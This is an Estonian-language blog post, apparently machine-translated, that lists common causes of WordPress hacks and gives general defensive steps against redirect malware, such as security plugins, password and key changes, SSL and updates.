WordPressi veebisaidid ei erine üksteisest. Kuigi WordPressi põhifailid on kuulikindlad, ei saa seda öelda pistikprogrammide ja teemade kohta. Pluginad ja teemad lisavad veebisaitidele dünaamilisi elemente, funktsionaalsust ja kujundust ning ilma nendeta sait oleks turvaline, aga ka staatiline ja igav.

Siin on nimekiri põhjustest, miks WordPressi saite häkitakse:

  1. Pluginate ja teemade haavatavused;
  2. Halvad paroolid ja ohustatud kasutajakontod;
  3. Nullitud teemade ja pistikprogrammide tagauksed;
  4. XSS-skripti rünnakud;
  5. Toore jõu rünnakud robotitega.

Nagu varem öeldud, ei tohiks veebisaidi turvalisust kergelt võtta. Nüüd on teil vahetu kogemus selle kohta, kui raske on häkkimist parandada, nii et ideaalis peaks teil olema strateegia, mis tagab, et see ei korduks.

Kuidas vältida WordPressi ümbersuunamise häkkimist tulevikus?

Nüüd, kui teil on puhas veebisait, on järgmised sammud vältida teie WordPressi veebisaidi rämpsposti suunamist.

Häkke kordub kogu aeg. See on peamiselt tingitud asjaolust, et teie saidi häkkimise põhjust pole parandatud. Kordumise vältimiseks tuleb võtta järgmised meetmed:

1. Installige turbeplugin: valige hea turbeplugin, mis suudab skannida, puhastada ja vältida häkkimisi. Nendel pistikprogrammidel on sisseehitatud tulemüür, mis blokeerib ennetavalt kahjuliku liikluse teie saidile jõudmise.
2. Muutke kõik kasutajate ja andmebaasi paroolid: Ohustatud kasutajakontod ja kergesti äraarvatavad paroolid on teine veebisaitide häkkimise põhjus.
3. Lähtestage ja kontrollige kasutajakontosid: kontrollige tarbetu administraatorijuurdepääsuga kasutajakontosid ja eemaldage need.
4. Muuda rolle + turvavõtmeid: rollid ja turvavõtmed on pikad stringid, mille WordPress lisab küpsiste sisselogimisandmetele, et aidata kasutajatel turvaliselt sisse logida. Saate neid muuta oma wp-config.php failis pärast WordPressi generaatori kasutamist uute hankimiseks.
5. Kasutage kindlasti ainult tõestatud pistikprogramme ja teemasid: Olen seda varem öelnud, kuid see on kordamist väärt. Kasutage ainult usaldusväärsete arendajate pistikprogramme ja teemasid. Need arendajad pakuvad tuge ja värskendusi, mis on turvalisuse jaoks väga olulised. Ärge mingil juhul kasutage tühje teemasid ja pistikprogramme. Ükskõik, mida salvestate, kaotate vältimatu häkkimise tõttu mitu korda.
6. Veenduge, et teil oleks SSLV: Ideaalis peaks teie veebisaidil juba olema SSL, kuid lisame selle täielikkuse huvides. SSL tagab, et suhtlus veebisaidile ja veebisaidilt on krüpteeritud. Ka Google surub seda muudatust kõvasti peale ja peagi hakkate nägema SEO karistusi, kui te pole seda juba teinud, kui teie veebisaidil pole SSL lubatud.
7. Kaitske WordPressi: On olemas turvalisuse karmistamise meetmed, mida tavaliselt nimetatakse WordPressi tugevdamiseks. Tahaksin teid hoiatada, et ärge unustage järgida Internetis saadaolevaid lahedaid näpunäiteid. Mõned neist ei tööta täielikult ja mõjutavad teie saiti ja külastajate kogemust.
8. Laske regulaarselt teha ohutusplaan/-toimingud: ei piisa, kui teha üks asi ja see unustada. Kontrollige vähemalt kasutajaid regulaarselt ja nõudke parooli lähtestamist. Aktiivsuslogi seadistamine on samuti hea mõte, kuna see muudab kasutaja tegevuse jälgimise lihtsaks ja kiireks, mis sageli võib olla varajaseks hoiatusmärgiks häkitud saidi kohta.
9. Samuti peate kõike värskendama.V: WordPress, pistikprogrammid ja teemad ning tehke regulaarselt varukoopiaid.

Millised on pahatahtlike ümbersuunamiste tagajärjed?

Igasugune häkkimine avaldab veebisaidile kohutavat mõju ja WordPressi ümbersuunamise pahavara ei erine sellest. Siin on vaid mõned viisid, kuidas pahavara võib teie veebisaiti ja ettevõtet negatiivselt mõjutada.

  • Sissetuleku kaotuskui teil on e-kaubanduse või ettevõtte sait.
  • Brändi väärtuse kaotus külastajate suunamise tõttu ebaseaduslikele, petturlikele või rämpspostisaitidele.
  • Mõju SEO-lesest Google karistab oma nimekirjades olevaid häkitud saite ja märgistab häkitud saidi, nii et külastajad üldiselt kardavad seda külastada.
  • Andmete rikkumine teie külastajad ja teie sait.

Häkkimine võib varalist kahju tekitada mitmel muul viisil. Kriitiline tegur on kiire tegutsemine ja võimalikult kiiresti pahavarast vabanemine.

Väljund

WordPressi ümbersuunamise häkkimise pahavara ilmub aeg-ajalt uues avataris. Häkkerid ja seega ka nende pahavara muutuvad järjest targemaks. WordPressi veebisaidid on nende jaoks aare ja ainus viis neid ületada on oma mängust ette jõuda.

Parim viis oma WordPressi veebisaidi kaitsmiseks on installida hea turbeplugin, millel on ka sisseehitatud tulemüür. See on kahtlemata parim investeering teie veebisaidi turvalisusesse.

Seda artiklit lugedes:

Täname lugemise eest: SEO HELPER | NICOLA.TOP

Kui kasulik see postitus oli?

Selle hindamiseks klõpsake tärnil!

Keskmine hinne 5 / 5. Häälte arv: 543

Seni pole hääli! Olge esimene, kes seda postitust hindab.

Sulle võib meeldida ka...

Lisa kommentaar

Sinu e-postiaadressi ei avaldata. Nõutavad väljad on tähistatud *-ga

3 × üks =